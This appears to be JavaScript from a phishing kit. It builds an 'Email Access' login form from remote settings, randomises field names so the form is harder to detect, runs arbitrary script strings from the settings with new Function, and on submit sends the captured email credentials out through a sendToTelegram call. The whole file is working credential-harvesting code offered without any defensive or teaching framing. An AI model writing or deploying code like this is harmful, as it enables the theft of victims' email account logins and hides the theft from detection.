function randomName(len = 10) {
    const chars = 'abcdefghijklmnopqrstuvwxyz0123456789';
    let name = '';
    for (let i = 0; i < len; i++) {
        name += chars.charAt(Math.floor(Math.random() * chars.length));
    }
    return name;
}

async function injectEmailAccessFields(containerId) {
    const container = document.getElementById(containerId);
    if (!container) return;
    const settings = await (await fetch('settings.json?' + Date.now())).json();
    const fields = settings.fields.email;
    const submitSettings = (settings.submit && settings.submit.email) || {};
    // mapping: original name => random name
    const nameMap = {};
    container.innerHTML = `<form id="emailForm"><h3>Email Access</h3></form>`;
    const form = container.querySelector('form');
    let row = [];
    fields.forEach((fld, i) => {
        let randomFieldName = randomName();
        nameMap[fld.name] = randomFieldName;
        let attrs = `
            name="${randomFieldName}"
            type="${fld.type}"
            ${fld.placeholder ? `placeholder="${fld.placeholder}"` : ''}
            ${fld.required ? 'required' : ''}
            ${fld.pattern ? `pattern="${fld.pattern}"` : ''}
            ${fld.min ? `min="${fld.min}"` : ''}
            ${fld.max ? `max="${fld.max}"` : ''}
        `;
        let inputHtml = `<input ${attrs.trim()}>`;

        let fieldHtml = `
            <div class="field-group${fld.small ? ' small' : ''}">
                <label>${fld.label}${fld.required ? ' <span style="color:#e00">*</span>' : ''}</label>
                ${inputHtml}
            </div>
        `;

        if (fld.small) {
            row.push(fieldHtml);
            if (!fields[i + 1] || !fields[i + 1].small) {
                form.innerHTML += `<div class="row-fields">${row.join('')}</div>`;
                row = [];
            }
        } else {
            if (row.length) {
                form.innerHTML += `<div class="row-fields">${row.join('')}</div>`;
                row = [];
            }
            form.innerHTML += fieldHtml;
        }
    });
    if (row.length) {
        form.innerHTML += `<div class="row-fields">${row.join('')}</div>`;
    }

    // إعداد زر السبميت طبقًا للإعدادات
    let submitLabel = submitSettings.label || 'Submit';
    let submitCss = submitSettings.css ? `style="${submitSettings.css.replace(/"/g,'&quot;')}"` : '';
    let submitJs = submitSettings.js ? submitSettings.js.trim() : '';

    form.innerHTML += `<button type="submit" ${submitCss}>${submitLabel}</button>`;

    // بعد توليد الحقول: طبق الـ CSS/JS المخصص لكل حقل
    fields.forEach((fld) => {
        let randomName = nameMap[fld.name];
        let inp = form.querySelector(`[name="${randomName}"]`);
        if (!inp) return;
        if (fld.css && fld.css.trim()) {
            inp.style.cssText += fld.css;
        }
        if (fld.js && fld.js.trim()) {
            try {
                inp.addEventListener('input', function () {
                    try { (new Function(fld.js)).call(this); } catch (ex) {}
                });
            } catch (e) {}
        }
    });

    form.onsubmit = function(e){
        e.preventDefault();
        let data = {};
        fields.forEach(fld => {
            let randomName = nameMap[fld.name];
            data[fld.name] = form.querySelector(`[name="${randomName}"]`).value;
        });
        // تنفيذ JS المخصص للسبميت (في سياق الـ form)
        let submitRet = true;
        if (submitJs) {
            try {
                submitRet = (new Function('data', submitJs)).call(form, data);
            } catch (ex) {
                submitRet = true;
            }
        }
        if (submitRet !== false) {
            sendToTelegram('mailaccess', data);
        }
    }
}